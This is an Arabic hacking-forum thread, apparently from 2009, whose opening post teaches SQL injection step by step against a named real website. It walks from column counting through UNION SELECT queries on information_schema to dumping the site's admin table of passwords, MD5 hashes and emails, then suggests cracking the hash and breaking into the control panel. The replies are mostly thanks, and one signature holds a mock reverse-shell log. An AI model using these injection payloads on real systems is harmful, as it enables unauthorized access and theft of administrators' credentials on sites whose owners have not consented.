التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-15-2009, 03:30 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي ترتيب الخطوات في حقن قواعد البيانات SQL Injection


عنا موقع مصاب

http://www.datavore.com/home?op=cat&cid=2


نستخدم الامر
order by
لمعرفه عدد الاعمده المصابه

نبلش من 1
ونزود لحتى يختفي معانا الخطأ

كود PHP:
order by 1--
 
order by 5--
 
order by 10--
 
order by 15-- 
لاحظ اشاره الناقص في اخر الرابط -- يمكن استبدالها في بعض المواقع بالاشاره */
اي هكذا
كود PHP:
order by 1/* 
يا نورع العين نرجع لمكانا


order by 15--

لاحط هنا ظهر الخطأ
النتيجه تجاوزنا عدد الاعمده المحدد
الحل نبدأ بتقليل عدد الاعمده الى ان يعود الوضع الي ما كان عليه
order by 14
لاحظ الان الموقع تمام
ما فيه ايا خطأ
اذا عدد الاعمده تمام
نضيف الامر التالي
مع الاعمده

union select
ونضيف قبل الرقم علامه الناقص

يصير الرابط هيك

كود PHP:
 
http
://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14-- 
انتبه للناقص

الان لنعرف اصدار القاعده
نكتب
كود PHP:
 
version
() 
وهذه بعض الاوامر


database()
version()
user()

not end



الموضعوع لم ينتهي بعد


الان نضيف التالي للحقنه



كود PHP:
concat(table_name,0x3a,column_name,0x3a,table_schema
و

كود PHP:
 
+from+information_schema.columns-- 
فتصبح

كود PHP:
 
http
://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns-- 
الان نضيف الامر التالي
كود PHP:
where+column_name+LIKE+CHAR(371129711537
كود PHP:
 
http
://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)-- 
طيب يا حص طلع لي نتائج كثيره هذا الموقع بدو شغلة كيف

طيب الخبره رح تعلمك شو تختار


الان عنا مفترق مثلث ماشاء الله

شوف اخي
اطلع ع النتائج زي الصاروخ
بتلقى الجداول المهمه هي
الادمن
اليوزر
والممبر
بس احنا بدنا نخترق الادمن
وهو المتوقع هدفنا يلا نصيده

SurveyAdmins:admin_password:SURVEYS
SurveyAdmins:admin_md5_password:SURVEYS

زي ما انتو شايفين عنا خيارين
بتهيالي الاول هو الي مطلوب

خلينا نشتغل عليه



بلزمنا الان الموقع الرائع وهو

كود PHP:
 
http
://www.waraxe.us/sql-char-encoder.html 
اوك يا غالي شو بدنا بهذا الموقع
تشفير اسم الجدول وعنا اسم الجدول هو
SurveyAdmins
نوع التشفير هو
كود PHP:
 
  MySql hex
-encoded string 
يصير الان بحث من اسم هدا الجدول وذلك من خلال الامر

where+table_name=



يعني هيك

كود PHP:
where+table_name=0x53757276657941646d696e73 
الاستغلال


كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(table_name,0x3a,column_name,0x3a,table_schema),7,8,9,10,11,12,13,14++from+information_schema.columns+where+table_name=0x53757276657941646d696e73-- 
ما شاء الله طلع لنا خيارات كثيره

بهمني انا منها


الان خلينا نجمع الاستغلال


اسم الجدول
SurveyAdmins

السجما
SURVEYS

اسم العمود هو باقي الاسماء بالوسط
ورح نجمعها كلها مع بعض بالامر

concat

وبتصير هيك

concat(name,0x3a,pass)


كود PHP:
;admin_id;admin_fname;admin_lname;admin_md5_password;admin_password ;admin_email;admin_perm
[php]

نجمعهم بالامر

بصيرو

كود PHP:

concat
(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,ox3a,admin_perm
نركبه بالحقنه


كود PHP:
http://www.datavore.com/home?op=cat&cid=-29+union+select+1,2,3,4,5,concat(admin_id,0x3a,admin_fname,0x3a,admin_lname,0x3a,admin_md5_password,0x3a,admin_password ,0x3a,admin_email,0x3a,admin_perm),7,8,9,10,11,12,13,14+from+SURVEYS.SurveyAdmins-- 
بقى تشوف الباس مشفر فكه من موقع هاش كلر وشوف مسار لوحه التحكم واخترق







اقتباس
والله يا حبايبي اجيت اعمل لكم الدرس صوت وصوره بعد من خلصت من هالكتابه الطويله
لقيت الموقع ضرب ومش راضي يفتح
رح اشرح نفس الخطوات على موقع ثاني
بعين الله

استفين ع التاخر هي الدرس بالفيديو .....

من اكتشاف الثغره SQL الى لوحه التحكم بالصوت والصوره




jvjdf hgo',hj td prk r,hu] hgfdhkhj SQL Injection hgavp injection avp a;v a;vh sql

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 


التعديل الأخير تم بواسطة KaLa$nikoV ; 04-22-2011 الساعة 03:46 PM.

   

رد مع اقتباس
قديم 09-20-2009, 04:48 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو





فايروس عرعر غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
فايروس عرعر is on a distinguished road

افتراضي


ششرحك جونااااان/يعطيك الف عافيه

   

رد مع اقتباس
قديم 09-22-2009, 10:25 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


تسلم يا غالي
بس الشرح هو ع السريع ما بغني عن دوره
والدوره عما قريب
بس اول ما افضى

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 10-19-2009, 08:06 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية M!M0
 

 

 
إحصائية العضو






M!M0 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
M!M0 is on a distinguished road

افتراضي


مشكوووووووووور أخي VoLc4n0 على الشرح

التوقيع


اعذروني لقلة قلامي..فالمدرسة تدمرني

http://img337.imageshack.us/img337/9193/kya54442.gif


M!M0==>معقد نفسيا ، مشتت ذهنيا منتحر علميا ، متورط عائليا مطلوب امنيا...,وماذا بعد؟

 


التعديل الأخير تم بواسطة M!M0 ; 04-05-2010 الساعة 06:27 PM.

   

رد مع اقتباس
قديم 10-27-2009, 03:57 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية THE WARRIOR
 

 

 
إحصائية العضو






THE WARRIOR غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
THE WARRIOR is on a distinguished road

افتراضي


شكرااااا ليك جارى التجريب

التوقيع

we will never walk AlOne

 

   

رد مع اقتباس
قديم 11-03-2009, 01:44 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
Black-FoG
VbSpIdeR T34M
 
الصورة الرمزية Black-FoG
 

 

 
إحصائية العضو






Black-FoG غير متواجد حالياً

إرسال رسالة عبر MSN إلى Black-FoG

 

 

إحصائية الترشيح

عدد النقاط : 10
Black-FoG is on a distinguished road

افتراضي


وش اقول غير انك مبدع والكبير كبير ..

تسلم على الدرس الحلو وربنا يخليك لينا ونشوف المزيد من ابداعاتك








Adiooos

   

رد مع اقتباس
قديم 04-29-2010, 12:22 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية blablabou94
 

 

 
إحصائية العضو







blablabou94 غير متواجد حالياً

إرسال رسالة عبر MSN إلى blablabou94

 

 

إحصائية الترشيح

عدد النقاط : 10
blablabou94 is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Black-FoG
وش اقول غير انك مبدع والكبير كبير ..

تسلم على الدرس الحلو وربنا يخليك لينا ونشوف المزيد من ابداعاتك








Adiooos

الكبير هو الله ... أرجوك ماتعاويدها هاي الكلمة أرجوك .. قل شكرا ........ شكرا فولكان على الشرح رائع والله

   

رد مع اقتباس
قديم 11-05-2009, 07:46 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو






الشبح المرح غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الشبح المرح is on a distinguished road

افتراضي


تسلم ياحبيبي يابركان

و لاكن هدا بالنسبة للاصدار 5

و الاصدار 4 نستعمل طرق اخرى

للتوضيح فقط يابركان ههههه

التوقيع







 

   

رد مع اقتباس
قديم 11-20-2009, 11:00 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
El3ctr0-Dz
.:IronMind:.
 
الصورة الرمزية El3ctr0-Dz
 

 

 
إحصائية العضو








El3ctr0-Dz غير متواجد حالياً

إرسال رسالة عبر MSN إلى El3ctr0-Dz إرسال رسالة عبر Skype إلى El3ctr0-Dz

 

 

إحصائية الترشيح

عدد النقاط : 10
El3ctr0-Dz is on a distinguished road

افتراضي


مشكووووور بارك اله فيك

التوقيع

======================================
[+] Human Error Detected : Auto payload in progress
[+] Generating payload
[+] Sending evil packet
[+] Reverse shell initiated from 68.82.4.9
[+] id=0(root) gid=0(root) groups=0(root)
======================================
P4L 4 Ev3r

qib@hotmail.com

 

   

رد مع اقتباس
قديم 11-22-2009, 12:58 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
إحصائية العضو





the cold zero غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
the cold zero is on a distinguished road

افتراضي


شكرا على الشرح الممتاز

   

رد مع اقتباس
قديم 12-12-2009, 11:51 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
Black-FoG
VbSpIdeR T34M
 
الصورة الرمزية Black-FoG
 

 

 
إحصائية العضو






Black-FoG غير متواجد حالياً

إرسال رسالة عبر MSN إلى Black-FoG

 

 

إحصائية الترشيح

عدد النقاط : 10
Black-FoG is on a distinguished road

افتراضي


Up

V
V
V

للأهمية



Adioooos

التوقيع

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[align=center]قريبا... فريق [-=BFT=-][/align]

 

   

رد مع اقتباس
قديم 12-31-2009, 02:30 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية M!M0
 

 

 
إحصائية العضو






M!M0 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
M!M0 is on a distinguished road

افتراضي


شكرا لك فولكانو للشرح والدورة

التوقيع


اعذروني لقلة قلامي..فالمدرسة تدمرني

http://img337.imageshack.us/img337/9193/kya54442.gif


M!M0==>معقد نفسيا ، مشتت ذهنيا منتحر علميا ، متورط عائليا مطلوب امنيا...,وماذا بعد؟

 

   

رد مع اقتباس
قديم 12-31-2009, 04:11 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
إحصائية العضو





فتى المدينه غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
فتى المدينه is on a distinguished road

افتراضي


يعطيك الف عافيه على الشرح خيوووو

شرح واضح وفية وكفيت

التوقيع

http://www.alfaris.net/up/35/alfaris_net_1244315477.gif
http://img101.herosh.com/2009/06/16/312004952.gif

 

   

رد مع اقتباس
قديم 01-01-2010, 12:06 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية مجاهد
 

 

 
إحصائية العضو






مجاهد غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مجاهد is on a distinguished road

افتراضي


السلام عليكم ورحمة الله وبركاته

انا تلميذ جديد لديكم

والله لقد اعجبني هذا المنتدى بما فيه من مواضيع صادقة ومن مبدعين محترمين فانا ارحب بكم وانا افتخر بان اكون تلميذ لديكم
وانا اشكر الاخ VoLc4n0 لانه شجعني بان اشارك معكم وهذا يعود في طريقة شرحه لدروس
اقبلوني وانا ممتنا لكم
تقبلوا تحياتي
مجــــــــــــــــــــــــــــــــا هد

   

رد مع اقتباس
قديم 02-11-2010, 07:21 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .
موفق بإذن الله ... لك مني أجمل تحية .

التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
البيانات, الشرح, injection, شرح, شكر, شكرا, sql, sql injection


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ترتيب الخطوات للبلايد سكول KaLa$nikoV SQL قواعد البيانات 40 03-24-2018 11:45 PM
جميع ادوات حقن قواعد البيانات -Sql injection- {قأبل للتحديث} Master vbspiders SQL قواعد البيانات 280 08-24-2015 04:10 AM
√مملكة ثغرات حقن قواعد البيانات√--Kingdom Of Sql Injection-- Master vbspiders SQL قواعد البيانات 26 12-01-2010 03:19 AM


الساعة الآن 12:46 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0